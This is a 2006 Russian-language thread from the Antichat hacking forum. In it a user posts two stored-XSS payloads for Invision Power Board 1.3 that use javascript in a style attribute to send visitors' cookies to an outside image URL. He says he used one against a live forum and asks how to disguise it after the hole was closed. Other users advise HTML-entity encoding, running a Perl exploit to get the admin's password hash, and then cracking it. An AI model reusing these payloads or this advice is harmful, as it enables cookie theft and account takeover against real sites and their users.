Форумы Invision 1.3 Xss ?

Discussion in 'Уязвимости CMS/форумов' started by slider, 23 May 2006.

  1. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Нужна поиощь есть форум

    http://forum.низя ссылки.ru

    Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

    На нем я использовал


    [E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

    Дыру закрыли

    То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

    Помогите зашифровать его или другой способ!!

    Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's
     
    #1 slider, 23 May 2006
    Last edited by a moderator: 23 May 2006
  2. *Van*

    *Van* Elder - Старейшина

    Joined:
    14 Aug 2005
    Messages:
    365
    Likes Received:
    19
    Reputations:
    12
    Попробуй зашифровать некоторые фрагменты сплойта тут:
    _http://www.h4cky0u.org/encrypt/index.php
    в кодировку HTML Entities
     
  3. em00s7

    em00s7 Elder - Старейшина

    Joined:
    2 May 2006
    Messages:
    169
    Likes Received:
    37
    Reputations:
    -10
    ТЫ не пробывал Этот эксплоит
     
  4. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Как использовать сплойт на forum.test.ru ID юзера 123
    perl 1.pl test.ru /forum/ 123 0

    Так?
     
  5. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Нашол другой XSS

    Можно ли его вставиить в картинку ??

    wj@wj[url=http://www.wj.com`=`][/url].com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);
     
  6. SanyaX

    SanyaX .::Club Life::.

    Joined:
    28 Jan 2005
    Messages:
    936
    Likes Received:
    396
    Reputations:
    261
    да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.
     
  7. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Ладно ЗАКРЫЛИ!

    Непрошол exploit
     
    #7 slider, 1 Jun 2006
    Last edited: 1 Jun 2006